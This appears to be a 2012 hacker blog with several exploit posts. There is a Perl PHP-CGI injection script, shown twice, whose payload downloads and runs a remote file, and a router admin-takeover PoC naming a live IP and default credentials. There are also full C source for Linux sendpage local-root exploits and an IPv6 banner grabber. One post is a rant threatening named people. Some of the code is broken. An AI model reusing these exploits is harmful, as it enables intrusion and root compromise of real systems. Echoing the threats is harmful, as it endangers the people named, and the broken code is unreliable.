Help pay for xds lawyer fees.
LR

[Exploit Updated]: PHP CGI – executes a payload wich is php shellexec(); ,My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

ALSO this CAN execute cmds ofc, i will addin a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

comments: 0 » tags: , , , , , , ,

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

 

Enjoy / xd–

comments: 0 » tags: , , , , , , , , ,

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
comments: 0 » tags: , , , , , , , , , ,

[IPv6 Stuff]: IPv6 banner grabber… ofcourse this will also get you the ipv4…. thx to r0t0r for this 1

Posted on 19th April 2012 in Codes, Exploits, Papers

Awesome code! written by a 13yr old, or well, when rotor was a young tadpole :P ~~

Thanks mate, this is definately going into the IPv6 toolkit ill be releaqsing soon on dd0s.ucoz.com or on bsd-demons.com, anywhere who will have me :0

Love the code, love the reasons why it was made… remember what this is for, grabbing the banner from the cisco modem if it is using it, (usually most hosters do..) , and then you would have ipv6 and ipv4 addys… enjoy and thx to rotor but, i will possibly try improove on this.. *TRY*

xd


/*
* c1zc0-cb4n6.c - ipv6 banner grabber
* by rotor  || bsd-demons.com

* stolen for my toolkit by xd :P ~ love ya mate!

* greetz to haxnet,hacked and fuck icer in the ass . and oh, did i forget krashed, ye fuck u to bitch.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void usage(char *nme);
int main(int argc, char *argv[]) {
int sock;
struct sockaddr_in6 target;
struct hostent *hostname;
char buff[1024];
if (argc < 3) {
usage(argv[0]);
}
printf("%s %s\n", argv[1], argv[2]);
if (( sock = socket(AF_INET6, SOCK_STREAM, 0)) < 0 ) {
printf("error creating socket\n");
exit(0);
}
memset((char *)&target, 0, sizeof(target));
if ((hostname = gethostbyname2(argv[1], AF_INET6)) == NULL) {
printf("error gethostbyname2\n");
exit(0);
}
target.sin6_port = htons(argv[2]);
target.sin6_family = AF_INET6;
memcpy((char *)&target.sin6_addr, hostname->h_addr, hostname->h_length);
if ((connect(sock,(struct sockaddr *)&target,sizeof(struct sockaddr_in6))) < 0) {
close(sock);
exit(1);
} else {
read(sock,&buff,910);
printf("%s",buff);
return(0);
}
}

void usage(char *nme) {
printf("%s <Host> <Port>[TRY 23]\n", nme);
exit(0);
}

and it will not end until everyone has abilitys to grab IPv4 from IPv6 , there will be NO *hiding*. thx.

XD

comments: 0 » tags: , , , , , , ,

LINUX HOSTING/IRC/ANTI-DoS NETWORK ~ GLOWSHELLS.NET IS FINALLY REOPENING!

Posted on 26th March 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

YEP FOLKS IT IS TRUE…

JUST WAITING ON FINALISING 2 OF THE DEDIS/COLOS AND ARE UP! THIS IS VERY AWESOME NEWS FOR ANYONE WHO STILL CARES FOR IRC!

YOU CAN BELIEVE IT GLOW WILL BEAT ANYONE,OFFER GTCOMM/STAMINUS/HOSTVIRTUAL AND ANOTHER UNNAMED COMPANY FOR ALL HOSTING/INCLUDES SOME WEB HOSTING EVEN IN SOME SPECIAL CASES IF THATS WHAT IS WANTED THEN GLOW WILL DOIT, IPV6 AND IPV4,THE GTCOMM BOXES ARE IRC/SHOUTCAST/IRCD/ANYTHING-YOU-WANT-ON-IRC BOXES AND, AT MOMENT IN MIDDLE OF PURCHASING THE DEDIS, AND, THE COLO BOX :D

REALLY GLOW COULD IOPEN AN HAVE OPENED AGES AGO, BUT, THEY JUST WAITED TO GET SOME DECENT IPV4 BACKBONES..SO I GUES THEYRE USABLE BUT, THEYRE JUST GOING TO ACTUALLY COMPETE, SOON…WICH WILL BE GREAT FOR EFNET.. AS, IT NEEDS THIS TYPE OF CO.

SOME MEMBERS WHO HAVE BEEN WITH US FOR AWHILE, WILL REALLY BE ADMINISTRATING THNGS, ALTHO, IT WILL BE ONLY THE SAME OWNER AS BEFORE *MOUSE_*WHO WILL BE HANDLING THE MAIN THINGS.

MOST OF IT THEN, WILL HAVE AN ADMIN OR ONE AND ONE CO ADMIN  PER BOX WICH WILL BE ON CALL 24/7 AND IF NOT YOU GET 1MONTH REFUND, YEP THATS THE TRUTH, IF YOU ENTER, AND, ARE CUSTOMER, AND ARE NOT HELPED WITHIN, 15MINUTES OF YOUR CHANNEL STAY, THE MONTH OR, A VHOST, SOMETHING, IS AUTOMATICALLY AND MAGICALLY, FREE!!! CANT BEAT THAT FOR SERVICE,ATLEAST YA KNOW IT GONNA BE GOOD!

SINCE THE BOXES ARE IN USA/CANADA/FRANCE/NETHERLANDS/SINGAPORE ,WE DECIDED TO MAKE 100% UPTIME BOXES,AND THAT IS SIMPLY USING ONE GTCOMM ADDY, FOR IRC OFCOURSE, WICH SITS ON A 4000GBPS ANTI D0S NETWORK.IT IS THE BEST GLOW IS ABLE AND CAN DO AND IT IS ALSO THE MOST EXPENSIVE NETWORKING, AND REQUORES VERY HIGH ID FOR JUST AX, IS THE MOST EXPENSIVE ROUTE TO TAKE FOR ANY SERVER SETUPS I HAVE SEEN… THIS SEEMS LIKE A ROBUST SERVICE AND, BOASTING ALREADY 400 VHOSTS JUST IN IPV6, WICH HALF ARE NOT EVEN TURNED ON APPRENTLY..MEANING, THEY HAVE OMUCH, THEY REALLY NOW, JUST WANT TO MAKE IT SHARED AND, FOR THOSE WHO WANT 100% UPTIME WRAITH BOTPAX ETC, WELL, HOW CAN YA BEAT, A LOGIN WICH HAS 4 BOXES IN 4 COUNTRIES!! HAHA! YA CANT, IT IS PERFECT, YOU CONTROL THEM, YOU HAVE 100% CONTROL.. SO, YOU GET A 100% AWESOME PRODUCT IN THE END!!! IT IS AWESOME FOR ANYONE HOSTING WRAITH, AND JUST NOW AS IT IS ON THE VPS GTCOMM, IT IS ALREADY HOSTING VERY EASILY, OVER 5-6 PEOPLE AND, THATS WITH OVER 30 WRAITHS NOW..AND NOT ONE BIT OF LAG.

ALTHO THERE WILLBE A COLO BOX THIS WONT BE OPENING FOR ATLEAST ONE MONTH BUT THE DEDIS WILL OPEN THIS WEEK,AND THE VPS IS ACTUALLY UP,IS FINE FOR HOSTING SO GLOW HAVE ALREADY BEEN NOW ACEEPTNIG NEW PEOPLE WHO  ARE SIMPLY FEDUP WITH ONE BOX/LOCATION AND/OR, SIMPLY KNOW THE DEICATION GLOWSHELLS HAS ALWAYS HAD WITH EFNET.

AS I UNDERSTAND IT WILL BE USING UNDERNET/AUSTNET/EFNET/DALNET/LCIRC/RIZON AND MOST COVERED NETWORKS WHO, WELL I ASSUME THOSE WERE OLD PLACES USED..

 

I KNOW FOR AUSSIES THIS IS ESPECIALLY COOL, AS ONE OF THE ADMINS IS AN AUSSIE, AND, HE IS NOT HALF BAD WHEN YOU ACTUALLY ARE NOT CALLING HIM AN A**E ETC..

 

ANYHOW FACT IS, GLOWSHELLS HAS AND ALWAYS WILL BE LIKE NO-OTHER, AND AT MOMENT IF YOUR INTERESTED IN ANYTHING THEN, HEAD TO EFNET IRC IRC.EFNET.ORG AND JOIN #GLOWSHELL-SUPPORT AND SIMPLY WAIT AND, WELL IM JUST WAITING TO SEE MOUSE OPPED AGAIN WHERE SHE SHOULD BE :D

 

I THANK PEOPLE ON EFNET, SPECIALLY SOME LIKE, RFS,CYPHER,FUZION,GIZMORE/WECHALL CHALLENGES,SERH,R0X0R,LORDNIKON,D3MON AND EINS AND EVEN JIMIGJ! HECK, YOU ALL HAVE SOMETHING UNIQUE IN SOME WAY…AND, I WILL BE SURE EVEYONE OF YOU IS HELPED…TALI FOR ALL YOUR HELP WITHOUT HARDLY KNOWING ME, WITH THE GTCOMM FAKE CHANNELS LOL)… AND, FUCKS TO ICER AND KRASHED, AND, YOU BOTH KNOW WHY, YOUR FUCKING BOTH BEEN BUSTED, BOTH HELPIN EACH OTHER, AND PEOPLE ARE STILL GETTING BUSTED…NOW, SINCE I HAVE REPORTED MR KRASHED TO GTCOMM, HIS DDOS HAS STOPPED.AND, I STILL DONT EVEN KNOW WHY HE DID NOT SIMPLY, TALK TO ME, LIKE HUMANS DO.

ANYHWO THINK HARD AND TALK FAST ARSEHOLE… BECAUSE, YOUR THE ONLY SOUR GRAPE IN MY MOUTH.

NOW, AS I WAS SAYING, ENJOY THE RETURN OF GLOWSHELLS AND BE NICE AS ALWAYS! HA!

DRU / XD / WORLDWIDE / KRYPTIK / AKA TEAM 0X90 , YEA, BITCHEZ, THE REAL DEAL HAS NEVER BEEN SO IN YA FACE.

 

NOW READ ON…

 

AND ON THE SOUR NOTE:

AS FOR ICER, YOU HAD A PACT WITH SOMEONE TO MAKE SOMETHING, YOU KNOW, SOMETIMES PEOPLE RELY ON THOSE FUNDS,A ND, WERE OF THE THOUGHTS THAT PERHAPS, YOU WERE IN NO PORBLEMS AS, YOU HAD NOT SAID ANYTHING AND, ASSUMED, EVEYTHING WAS GOING FINE, BUT, AS YOU SAW, IT WAS, ABIT OF DISTRUST ON ONE SIDE BUT, YOU HAD THE CHANCE TO TALK TO THE WEB DESIGNER AND INSTEAD YOU GO HAND THE MONEY TO SOME FUCKING YANKEE WHO PROLLY DOESNT NEED IT.

WELL YOU WILL PAY 200X 10, ATLEAST FOR THAT INSULT YOU SHIT HEAD.

AND NO, I DONT THINK YOUR A *FED* BUT, I DEFINATELY WONDER WHY YOU WOULD ALLOW THIS KRASHED FELLOW, WHO IS A KNOWN HBI SNITCHER, TO HAVE SOMUCH DAMNA XCS TO THE BOTS AND, EVEYTHING IT SEEMS ABOUT YOUR MAGICSHELLS FILTH COMPANY..AND OH FUNNY BUT, WHEN I INVESTIGATED THE IPS, I FOUND OMETHING FUNNY…YEA…AND, I WONT MENTION IT HERE BUT LETS JUST SAY, SHAME ON YOU FOR ALLOWING ANYONE TO RUN B OTNET FROM YOUR SHIT YOU MAGGOT. AND REMEMBER WHERE YOU LIVE, AND THEN WHY THEY ARE SO COCKY AND WHERE THEY LIVE.

JUST REMEMBER, I AINT A FUCKING CRIPPLE MOTHERFUCKER, YOU BETTER FIX THINGS VERY DAMN FAST ABOUT THAT 200 BUX WICH WA MEANT TO BE HEADED MY WAY, AND, THATS BUSINESS YOU CALL IT, TO USE ME, AS A GO BETWEEN, SO, I ASSUME YOU DONT SPEAK TO YOUR BOSSES THEN ? YOU JUST SEND IN A COFFEE BOY AND ASK HIM TO ASK THE BOSS YES / COZ YOU SAID, THATS HOW YOU DO BUSINES… AND, AS I SHOWED YOU, AND WILL KEEP SHOWING YOU, IT IS NOT HOW I DO MY BUSINESS, ASFAR AS I SEE IT, IM OWED 200BUX, AND, SURE, YOU CAN HAVE WHATEVER DEIGN YOU WERE ALREADY THINKING, OR SIMPLY, COP THE FINE, WICH IS MORE FUN FOR ME! BELIEVE ME ARSEHOLE, YOU OWN A SHITTY LITTLE INT CAFE I ALREADY TRACKED DOWN, NOW YOUR EVEN CLOSER TO ME THAN EVER…AND, YOU THINK I WONT USE YOUR CASH AGAINST YOU STUPID. WHERE YOU THINK THE PAIN IS GREEK ? EH, ITS ALWAYS IN THE PCKET.. ASK KCOPE, HE HAS NO PCOKETS THANKS TO HIS FUCKUP IN 2K9… AND STILL, WILL NEVER, EVER BE ACCPETED,EVEN IF HE MADE A REMOTE ROOT FOR EVRY OS IN EXISTANCE AND, I WILL BE SURE TO MAKE YOUR REP THE SAME BITCH.

IT IS NOT HARD AND AS I SAID, I JUST HAVE TO SHOWUP TO YOUR FUCKING *ANYWHERE* I LIKE, COZ, IT IS A PUBLIC FUCKING WORLD…AND, SPEAK NICELY TO YOU :)

HEY, I DID NOT SAY ANYTHING ABOUT BEATINGS ETC… I JUST SIMPLY MENTIONED, YOUR PRIORITYS, YOUR WANTS AND LOVES, AND, HOW EASILY THOSE, CAN BE USED AGAINST PEOPLE NOWDAYS AND ALWAYS DAYS.

comments: 0 » tags: , , , , , , , , ,

PF_UNIX sendpage() 2010 2.6.18.el5-dev/2.6.18-164.el5xen/2.6.X depends on socket existing.. this is in 3 parts here, PF_UNIX,PF_ECONET and PF_BLUETOOTH Linux working local root exploits (.c)

Posted on 13th October 2011 in Codes, Exploits

Ok 2 variants,since an idiot 1337sht.com ppl leaked things they dont yet even know how to make BEST use of but anyhow.. here, some gifts… and one is special :< unf is goin to b patched or is patched..depends on what you also do, but mmap is a big trick , b sure to also remmber the UNIX socket prblem, can mmap null page and workable with bsd ;) Yes its patched but, only with latest free-bsd update .. hehe...nasty!

Code for Bluetouth socketx, with fixed mmap...a shitty old vuln wich was not really leaked onto exploit places like 1337shit.com or whatever they call themself... lamahs i call them

/* Bluetooth Sendpage socket() local root exploit
 * Linux 2.6.18-128.el5
 * Linux 2.6.9-89.EL
 * Ubuntu 8.10 Linux 2.6.27
 *
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 – 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 – 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 – 1);
#else
    task_struct = current_stack_pointer() & ~(8192 – 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()  /* use this in 2011! (xd) */

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
// ye dunno why the other idjits are still tryin to nullpage mmap..useless can do it easier like..
    if ((addr=mmap(0×0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = ‘\xff’;
    addr[1] = ‘\x24′;
    addr[2] = ‘\x25′;
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = ‘\xff’;
    addr[1] = ‘\x25′;
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = ‘\x3f’;
    addr[1] = ‘\xe0′;
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = ‘\x63′;
    addr[5] = ‘\xff’;
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = ‘\x7f’;
    addr[9] = ‘\xe9′;
    addr[10] = ‘\x03′;
    addr[11] = ‘\xa6′;
    addr[12] = ‘\x4e’;
    addr[13] = ‘\x80′;
    addr[14] = ‘\x04′;
    addr[15] = ‘\x20′;
#endif
#endif
    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

Code for PF_UNIX sendpage() socketx (my version):

/* UNIX socket() local root exploit (OS Portable version)
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize()

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
    if ((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
